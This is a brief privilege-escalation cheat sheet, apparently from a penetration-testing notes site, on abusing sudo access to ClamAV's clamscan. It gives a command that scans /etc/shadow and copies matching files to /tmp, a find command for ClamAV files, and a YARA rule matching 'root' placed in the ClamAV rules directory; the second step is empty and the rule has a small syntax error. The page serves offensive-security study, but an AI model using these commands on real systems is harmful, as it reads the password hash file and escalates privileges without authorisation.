Sudo ClamAV Privilege Escalation
Investigation
sudo /usr/bin/clamscan /etc/shadow --copy=/tmp/resultsExploitation
1. Create a Yara Rule
find / -name "clam*" 2>/dev/null# /var/lib/clamav/test.yara
rule test
{
strings:
$string = "root"
conditions:
$string
}2. Execute ClamScan
Last updated